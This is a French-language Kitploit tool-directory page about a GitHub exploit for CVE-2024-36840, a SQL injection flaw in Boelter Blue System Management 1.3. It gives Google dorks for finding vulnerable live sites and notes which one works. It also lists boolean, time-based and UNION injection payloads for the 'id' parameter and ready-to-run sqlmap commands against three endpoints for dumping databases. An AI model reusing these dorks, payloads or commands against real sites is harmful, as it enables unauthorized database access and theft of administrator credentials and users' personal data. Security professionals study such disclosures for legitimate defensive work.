Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-36840-Exploit — Exploit pour : CVE-2024-36840 : Vulnérabilité d'injection SQL dans Boelter Blue System Management (version 1.3) | Kitploit
Outils/GitHubGitHub/theexploiters/cve-2024-36840-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubtheexploiters/cve-2024-36840-exploit

CVE-2024-36840-Exploit

Exploit pour : CVE-2024-36840 : Vulnérabilité d'injection SQL dans Boelter Blue System Management (version 1.3)

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-36840 : Vulnérabilité d'injection SQL dans Boelter Blue System Management (version 1.3)

Détails de l'exploit

  • Titre de l'exploit : Vulnérabilité d'injection SQL dans Boelter Blue System Management (version 1.3)

  • Google Dork original : inurl:"Powered by Boelter Blue" (n'a pas fonctionné (zéro URL dans la recherche))

  • Google Dork par Theexploiters : intext:"Powered by Boelter Blue" (fonctionne)

  • Date : 2024-06-04

  • Auteur de l'exploit : CBKB (DeadlyData, R4d1x)

  • Page d'accueil du fournisseur : Boelter Blue

  • Lien du logiciel : Google Play Store

  • Version : 1.3

  • Testé sur : Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12

  • CVE : CVE-2024-36840

Description de la vulnérabilité

Plusieurs vulnérabilités d'injection SQL ont été identifiées dans Boelter Blue System Management (version 1.3). Ces vulnérabilités permettent aux attaquants d'injecter et d'exécuter des commandes SQL arbitraires via divers paramètres. Une exploitation réussie peut entraîner un accès non autorisé, une exfiltration de données et d'éventuelles prises de contrôle de comptes.

Paramètres affectés et détails de l'exploit :

  1. Paramètre : id (GET)

    • Type : aveugle basé sur booléen
    • Payload : id=10071 AND 4036=4036
  2. Type : aveugle basé sur le temps

    • Payload : id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)
  3. Type : requête UNION

    • Payload : id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...

Points de terminaison vulnérables

  1. news_details.php?id

    • Exemple : https://www.example.com/news_details.php?id=10071
    • Exploitation :
      root@kitploit:~
      sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
      
  2. services.php?section

    • Exemple : https://www.example.com/services.php?section=5081
    • Exploitation :
      root@kitploit:~
      sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
      
  3. location_details.php?id

    • Exemple : https://www.example.com/location_details.php?id=836
    • Exploitation :
      root@kitploit:~
      sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs
      

Impact

  • Accès non autorisé à la base de données : L'exploitation peut conduire à un accès non autorisé à la base de données, permettant aux attaquants d'extraire des informations sensibles.
  • Fuite de données : Des données sensibles telles que les identifiants administrateur, les informations personnelles des utilisateurs et l'historique d'achat peuvent être compromises.
  • Prises de contrôle de comptes : Les attaquants peuvent potentiellement prendre le contrôle des comptes utilisateurs.
  • Contrôle total : Un contrôle total de l'application affectée peut être obtenu, entraînant de graves implications en matière de sécurité.

Crédits

  • Découvreurs : CBKB (DeadlyData, R4d1x)

Références

  • Rapport de vulnérabilité CyberDepot
  • CVE-2024-36840

Compteur de vues du dépôt

Télécharger l’outil